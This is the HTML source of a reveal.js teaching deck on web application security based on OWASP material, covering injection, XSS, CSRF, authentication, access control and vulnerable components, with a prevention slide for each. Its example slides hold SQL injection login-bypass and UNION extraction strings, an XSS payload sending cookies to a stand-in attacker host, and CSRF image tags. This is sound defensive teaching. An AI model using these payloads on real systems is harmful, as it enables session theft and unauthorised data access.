<!doctype html>
<html lang="en">

	<head>
		<meta charset="utf-8">

		<title>Web Application Security in a nutshell</title>

		<meta name="description" content="An ultra-compact intro (or refresher) to Web Application Security">
		<meta name="author" content="Bjoern Kimminich">

		<meta name="apple-mobile-web-app-capable" content="yes" />
		<meta name="apple-mobile-web-app-status-bar-style" content="black-translucent" />

		<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">

		<link rel="stylesheet" href="css/reveal.min.css">
		<link rel="stylesheet" href="css/theme/default.css" id="theme">

		<!-- For syntax highlighting -->
		<link rel="stylesheet" href="lib/css/zenburn.css">

		<!-- If the query includes 'print-pdf', include the PDF print sheet -->
		<script>
			if( window.location.search.match( /print-pdf/gi ) ) {
				var link = document.createElement( 'link' );
				link.rel = 'stylesheet';
				link.type = 'text/css';
				link.href = 'css/print/pdf.css';
				document.getElementsByTagName( 'head' )[0].appendChild( link );
			}
		</script>

		<!--[if lt IE 9]>
		<script src="lib/js/html5shiv.js"></script>
		<![endif]-->
	</head>

	<body>

		<div class="reveal">

			<!-- Any section element inside of this container is displayed as a slide -->
			<div class="slides">
                <section>
                    <section>
                        <h1>Web Application Security</h1>
                        <h2>in a nutshell</h2>
                        <h5>An ultra-compact intro (or refresher) to Web Application Security</h5>
                        <p>
                            <small>Created by <a href="http://kimminich.de">Björn Kimminich</a> / <a href="http://twitter.com/bkimminich">@bkimminich</a></small>
                        </p>
                    </section>
                    <section>
                        <h2>Björn Kimminich</h2>
                        <ul>
                            <li>Application Security Officer at <a href="http://kuehne-nagel.com">Kuehne + Nagel (AG & Co.) KG</a></li>
                            <li>Author of open-source pentest training webapp <a href="https://github.com/bkimminich/juice-shop">juice-shop</a></li>
                            <li><a href="https://owasp.org">OWASP</a> member and <a href="https://code.google.com/p/zaproxy/">OWASP Zed Attack Proxy</a> contributor</li>
                        </ul>
                    </section>
                </section>

				<section>
                    <h2>Famous last words...</h2>
                    <blockquote>
                        &ldquo;Nobody would bother to hack us.&rdquo;
                    </blockquote>
                    <blockquote>
                        &ldquo;Our Firewall, IDS and IPS will keep us safe.&rdquo;
                    </blockquote>
                    <blockquote>
                        &ldquo;We will add security to the system later.&rdquo;
                    </blockquote>
                    <blockquote>
                        &ldquo;What's the worst that could actually happen?&rdquo;
                    </blockquote>
                </section>

                <section>
                    <section>
                        <h2>Injection</h2>
                    </section>
                    <section>
                        <h3>Injection means...</h3>
                        <p>
                            ...tricking an application into including unintended commands in the data sent to an interpreter.
                        </p>
                    </section>
                    <section>
                        <h3>Interpreter means...</h3>
                        <p>
                            ...a program that takes a <code data-trim contenteditable>String</code> and interprets it as a command.
                        </p>
                    </section>
                    <section>
                        <h3>Interpreters are used for...</h3>
                        <ul>
                            <li>SQL</li>
                            <li>HQL</li>
                            <li>OS Shell</li>
                            <li>LDAP</li>
                            <li>XPath</li>
                            <li>...</li>
                        </ul>
                    </section>
                </section>

                <section>
                    <section>
                        <h3>Bypassing Authentication</h3>
                        <h5>with SQL Injection</h5>
                        <pre><code class="java" data-trim>
String query = "SELECT id FROM users " +
               "WHERE name = '" + req.getParameter("username") + "'" +
               "AND password = '" + req.getParameter("password") + "'";
                        </code></pre>
                        <p>The indented use case results in a query like this:</p>
                        <pre><code class="sql" data-trim contenteditable>
SELECT id FROM users WHERE name = 'bjoern' AND password = 'secret'
                        </code></pre>
                    </section>
                    <section>
                        <h3>Attack Examples</h3>
                        <h5>on authentication queries</h5>
                        <p>Disabling password check for a known username:</p>
                        <pre><code class="sql" data-trim contenteditable>
SELECT id FROM users WHERE name = 'bjoern'--' AND password = '?'
                        </code></pre>
                        <p>Logging in without even knowing a username:</p>
                        <pre><code class="sql" data-trim contenteditable>
SELECT id FROM users WHERE name = '' or 1=1--' AND password = '?'
                        </code></pre>
                    </section>
                </section>

                <section>
                    <section>
                        <h3>Spying out Data</h3>
                        <h5>with SQL Injection</h5>
                        <pre><code class="java" data-trim>
String query =
            "SELECT id,author,title,price FROM books " +
            "WHERE title LIKE '%" + req.getParameter("query") + "%'";
                        </code></pre>
                        <p>The indented use case results in a query like this:</p>
                        <pre><code class="sql" data-trim contenteditable>
SELECT id,author,title,price FROM books WHERE title LIKE '%tangled web%'
                        </code></pre>
                    </section>
                    <section>
                        <h3>Attack Examples</h3>
                        <h5>on data retrieval queries</h5>
                        <p>Probing for right number of result set columns:</p>
                        <pre><code class="sql" data-trim>
SELECT [...] WHERE title LIKE '%' UNION SELECT null FROM users--%'
                        </code></pre>
                        <pre class="fragment"><code class="sql" data-trim>
SELECT [...] WHERE title LIKE '%' UNION SELECT null,null FROM users--%'
                        </code></pre>
                        <pre class="fragment"><code class="sql" data-trim>
SELECT [...] WHERE title LIKE '%' UNION SELECT null,null,null FROM users--%'
                        </code></pre>
                        <div class="fragment">
                            <p>Using known column names to extract data:</p>
                            <pre><code class="sql" data-trim>
SELECT [...] WHERE title LIKE '%' UNION SELECT name,password,email FROM users--%'
                            </code></pre>
                        </div>
                    </section>
                </section>

                <section>
                    <h3>Preventing Injection</h3>
                    <ul>
                        <li>Avoid Interpreters</li>
                        <li>Bind Variables</li>
                        <li>Prepared Statements</li>
                        <li>Least Privileges for app DB user</li>
                        <li>White List Input Validation</li>
                    </ul>
                </section>

                <section>
                    <section>
                        <h2>Cross Site Scripting (XSS)</h2>
                    </section>
                    <section>
                        <h3>Malicious Code is sent...</h3>
                        <p>
                            ...to an innocent user's browser through
                        </p>
                        <ul>
                            <li>a form field or URL (Reflected XSS)</li>
                            <li>a previously stored DB record (Persistent XSS)</li>
                            <li>a DOM element of a rich JS client (Local XSS)</li>
                        </ul>
                    </section>
                    <section>
                        <h3>Possible Damage from XSS</h3>
                        <ul>
                            <li>stolen user session</li>
                            <li>stolen sensitive data</li>
                            <li>rewriting web page</li>
                            <li>redirecting to malicious site</li>
                        </ul>
                    </section>
                </section>

                <section>
                    <section>
                        <h3>XSS Vulnerability Example</h3>
                        <pre><code class="command" data-trim contenteditable>
http://bookwo.rm/titles/search?keywords=raspberry%20pi
                        </code></pre>
                        <p>The indented use case is to display the keywords above the results:</p>
                        <pre><code class="java" data-trim contenteditable>
<%
String keywords = request.getParameter("keywords");
List&lt;Book&gt; results = titleSearchService.findByKeywords(keywords.split(" "));
%>
There are <%=results.count()%> results for your search by &lt;em&gt;<%=keywords%>&lt;/em&gt;
&lt;table&gt;
    <% for (Book book : results) { %>
      // render result as table rows
    <% } %>
&lt;/table&gt;
                        </code></pre>
                    </section>
                    <section>
                        <h3>XSS Attack Examples</h3>
                        <p>Probing for XSS Vulnerability</p>
                        <pre><code class="command" data-trim contenteditable>
&lt;script&gt;alert(1)&lt;/script&gt;
                        </code></pre>
                        <p>Stealing User Session</p>
                        <pre><code class="command" data-trim contenteditable>
&lt;script&gt;
    new Image().src="http://my.evil-si.te/hijack.php?c="+encodeURI(document.cookie);
&lt;/script&gt;
                        </code></pre>
                        <p>Site Defacement</p>
                        <pre><code class="command" data-trim contenteditable>
&lt;script&gt;document.body.background="http://my.evil-si.te/image.jpg";&lt;/script&gt;
                        </code></pre>
                    </section>
                </section>

                <section>
                    <h3>Preventing XSS</h3>
                    <ul>
                        <li>Do not unnecessarily include user supplied input into output</li>
                        <li>Output encode <strong>all</strong> user supplied input</li>
                        <li>Sanitize HTML where user supplied HTML is unavoidable</li>
                        <li>White List Input Validation</li>
                    </ul>
                </section>

                <section>
                    <section>
                        <h2>Cross Site Request Forgery (CSRF)</h2>
                    </section>
                    <section>
                        <h3>A Victim's Browser...</h3>
                            <p>
                                ...is tricked into issuing a command to a vulnerable webapp. This is caused by browsers automatically including user authentication data with each request.
                            </p>
                            <ul>
                                <li>Session Cookie</li>
                                <li>Basic Authentication</li>
                                <li><code>Authorization</code> HTTP Header</li>
                                <li>...</li>
                            </ul>
                    </section>
                </section>

                <section>
                    <h3>CSRF Attack Examples</h3>
                    <img src="http://127.0.0.1/api/user/1/delete" width="200" height="300">
                    <img src="http://router.box/admin/reset" width="200" height="300">
                    <img src="http://myfor.um/logout.php" width="200" height="300">
                </section>

                <section>
                    <h3>Preventing CSRF</h3>
                    <ul>
                        <li>Add a secret token to all sensitive requests</li>
                        <li>This token must not be automatically submitted</li>
                        <li>Require secondary authentication for sensitive functions</li>
                        <li>Beware exposing the token in a <code>Referer</code> HTTP header</li>
                    </ul>
                    <hr>
                    <p>
                        Make sure your application has no XSS holes that could be exploited to attack others!
                    </p>
                </section>

                <section>
                    <section>
                        <h2>Broken Authentication</h2>
                    </section>
                    <section>
                        <h3>Typical Authentication Flaws</h3>
                        <ul>
                            <li>Allowing weak passwords</li>
                            <li>Storing SSL certificate insecurely</li>
                            <li>Credentials passed via insecure <code>http</code> connection</li>
                            <li>Expose session id's in URLs, via unencrypted network, logs, ...</li>
                        </ul>
                    </section>
                    <section>
                        <h3>Side Channel Attack Vectors</h3>
                        <ul>
                            <li>Change Password</li>
                            <li>&ldquo;Remember me&rdquo;</li>
                            <li>Forgot Password</li>
                            <li>Secret Questions</li>
                        </ul>
                    </section>
                </section>

                <section>
                    <h3>Classical Broken Authentication...</h3>
                    <h5>...due to starting login process on unencrypted page</h5>
                    <pre><code data-trim contenteditable>
http://sick-cure-ba.nk/login.do
                    </code></pre>
                    <pre><code class="command" data-trim>
POST /login.do HTTP/1.1
Host: sick-cure-ba.nk
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded

username=bjoern&password=secret
                    </code></pre>
                </section>

                <section>
                    <h3>Weak hashes put passwords at risk...</h3>
                    <h5>...as do unsalted strong hash algorithms</h5>
                    <table>
                        <thead>
                        <tr>
                            <th>id</th>
                            <th>username</th>
                            <th>password</th>
                        </tr>
                        </thead>
                        <tbody>
                        <tr>
                            <td>1</td>
                            <td>admin</td>
                            <td><small>d033e22ae348aeb5660fc2140aec35850c4da997</small></td>
                        <tr/>
                        <tr>
                            <td>2</td>
                            <td>bjoern</td>
                            <td><small>2bb80d537b1da3e38bd30361aa855686bde0eacd7162fef6a25fe97bf527a25b</small></td>
                        <tr/>
                        <tr>
                            <td>3</td>
                            <td>localhorst</td>
                            <td><small>
                                0f59bd4122f0c02002ec578e4eec306ed48ff2ad0105a307a6dc98c0e9a54fe4
                                64e5f807236edce12134067a0b6690891e82490b2b9fa7b4171db43ee8cb4006
                            </small></td>
                        <tr/>
                        </tbody>
                    </table>
                    <hr>
                    <p>
                        <small>
                            Cracking unsalted hashes with a <a href="http://en.wikipedia.org/wiki/Rainbow_table">Rainbow Table</a> attack is fast, even though the last two of them might seem sufficiently secure given their 256 and 512bit length.
                            You can even crack password hashes online, e.g. at <a href="https://crackstation.net/">CrackStation</a> or via <a href="https://twitter.com/PlzCrack">a tweet to @PlzCrack</a>.
                        </small>
                    </p>
                </section>

                <section>
                    <h3>Securing Authentication</h3>
                    <ul>
                        <li>Centralized and standardize authentication</li>
                        <li>Protect credentials with SSL/TLS</li>
                        <li>Use strong authentication mechanism (with multiple factors)</li>
                        <li>Do not store or log unencrypted credentials</li>
                    </ul>
                </section>

                <section>
                    <section>
                        <h2>Broken Access Control</h2>
                    </section>
                    <section>
                        <h3>Common Authorization Mistakes</h3>
                        <ul>
                            <li>Hiding object references instead of restricting access</li>
                            <li>Displaying only authorized links and menu choices</li>
                            <li>Trusting client-side access control mechanisms</li>
                            <li>Lack of server-side verification of user privileges</li>
                        </ul>
                    </section>
                </section>

                <section>
                    <h3>Request Tampering for Privilege Escalation...</h3>
                    <h5>...and finding all kinds of Access Control Issues</h5>
                        <pre><code class="command" data-trim contenteditable>
http://logistics-worldwi.de/showShipment?id=40643108
                        </code></pre>
                        <pre><code class="command" data-trim contenteditable>
http://my-universi.ty/api/students/6503/exams/view
                        </code></pre>
                        <pre><code class="command" data-trim contenteditable>
http://document-warehou.se/landingpage?content=index.html
                        </code></pre>
                    </section>

                <section>
                    <h3>Securing Access Control</h3>
                    <ul>
                        <li>Never rely on <q>&ldquo;Security by obscurity&rdquo;</q></li>
                        <li>Replace direct object references with temporary mappings</li>
                        <li>Restrict data and functionality access to authorized users</li>
                        <li>Enforce user or role based permissions</li>
                    </ul>
                </section>

                <section>
                    <section>
                        <h2>Broken Environment</h2>
                    </section>
                    <section>
                        <h3>Possible Environmental Vulnerabilities</h3>
                        <ul>
                            <li>Software Libraries</li>
                            <li>Application Server</li>
                            <li>Web Server</li>
                            <li>Operating System</li>
                            <li>...</li>
                        </ul>
                    </section>
                </section>

                <section>
                    <h3>Known Vulnerability Examples</h3>
                    <table>
                        <thead>
                        <tr>
                            <th>Component</th>
                            <th>Vulnerability</th>
                            <th>Affected</th>
                        </tr>
                        </thead>
                        <tbody>
                        <tr>
                            <td>OpenSSL</td>
                            <td><small>Obtain sensitive information from process memory via crafted packets that trigger a buffer over-read (<a href="http://heartbleed.com/">Heartbleed</a>)</small></td>
                            <td><small>1.0.1 - 1.0.1f, 1.0.2-beta, 1.0.2-beta1</small></td>
                        <tr/>
                        <tr class="fragment">
                            <td>Unix Bash</td>
                            <td><small>Execution of arbitrary commands on vulnerable Bash, potentially compromising the entire system (<a href="http://en.wikipedia.org/wiki/Shellshock_(software_bug)">Shellshock</a>)</small></td>
                            <td><small>CGI, OpenSSH, DHCP, QMail, ...</small></td>
                        <tr/>
                        <tr class="fragment">
                            <td>Struts</td>
                            <td><small>Remote manipulation of the <code>ClassLoader</code> via the <code>class</code> parameter, which is passed to the <code>getClass()</code> method</small></td>
                            <td><small>before 2.3.16.1</small></td>
                        <tr/>
                        <tr class="fragment">
                            <td>Struts</td>
                            <td><small>Wildcard <code>cookiesName</code> not properly restricts access to the <code>getClass()</code> method, which allows <code>ClassLoader</code> manipulation</small></td>
                            <td><small>before 2.3.16.2</small></td>
                        <tr/>
                        </tbody>
                    </table>
                </section>

                <section>
                    <h3>Protection from Environmental Vulnerabilities</h3>
                    <ul>
                        <li>Monitor security of used components</li>
                        <li>Keep up with patches for used components</li>
                        <li>Remove unnecessary stuff on all levels</li>
                        <li>Restrict use of unapproved components</li>
                    </ul>
                    <hr>
                    <p>
                        <small>
                            Java and .NET project dependencies can be monitored by <a href="https://www.owasp.org/index.php/OWASP_Dependency_Check">OWASP Dependency Check</a> which
                            relies on the <a href="http://nvd.nist.gov/download.cfm">NIST National Vulnerability Database</a>. For Javascript and Node.js modules there is
                            <a href="http://bekk.github.io/retire.js/">Retire.js</a> which is updated manually via <a href="https://github.com/bekk/retire.js">its GitHub project</a>.
                            Both tools integrate well with typical software build processes.
                        </small>
                    </p>
                </section>

                <section>
                    <section>
                        <h1>Q&A</h1>
                    </section>
                    <section>
                        <h2>Credits</h2>
                            <p>Presentation created with <a href="https://github.com/hakimel/reveal.js">reveal.js</a></p><small>The HTML Presentation Framework</small>
                            <p>Based on free material provided by <a href="https://owasp.org">OWASP</a></p><small>The Open Web Application Security Project</small>
                            <p>Background image based on <a href="http://sephiroth-kmfdm.deviantart.com/art/Digital-Shodan-56013493">Digital Shodan</a> by <a href="http://sephiroth-kmfdm.deviantart.com/">sephiroth-kmfdm</a></p>
                    </section>
                </section>

				<section>
					<h1>THE END</h1>
					<h3>by Björn Kimminich / kimminich.de</h3>
                    <p>
                        These slides are publicly available on <a href="https://github.com/bkimminich/webappsec-nutshell">GitHub</a> and <a href="http://slideshare.net/BjrnKimminich/web-application-security-in-a-nutshell">Slideshare</a>.
                    </p>
				</section>

			</div>

		</div>

		<script src="lib/js/head.min.js"></script>
		<script src="js/reveal.min.js"></script>

		<script>

			// Full list of configuration options available here:
			// https://github.com/hakimel/reveal.js#configuration
			Reveal.initialize({
				controls: true,
				progress: true,
				history: true,
				center: true,

				theme: Reveal.getQueryHash().theme || 'moon', // available themes are in /css/theme
				transition: Reveal.getQueryHash().transition || 'concave', // default/cube/page/concave/zoom/linear/fade/none

				// Parallax scrolling
				parallaxBackgroundImage: 'assets/shodan_dark_blurry.jpg',
				parallaxBackgroundSize: '2300px 1600px',

				// Optional libraries used to extend on reveal.js
				dependencies: [
					{ src: 'lib/js/classList.js', condition: function() { return !document.body.classList; } },
					{ src: 'plugin/markdown/marked.js', condition: function() { return !!document.querySelector( '[data-markdown]' ); } },
					{ src: 'plugin/markdown/markdown.js', condition: function() { return !!document.querySelector( '[data-markdown]' ); } },
					{ src: 'plugin/highlight/highlight.js', async: true, callback: function() { hljs.initHighlightingOnLoad(); } },
					{ src: 'plugin/zoom-js/zoom.js', async: true, condition: function() { return !!document.body.classList; } },
					{ src: 'plugin/notes/notes.js', async: true, condition: function() { return !!document.body.classList; } }
				]
			});

		</script>

	</body>
</html>
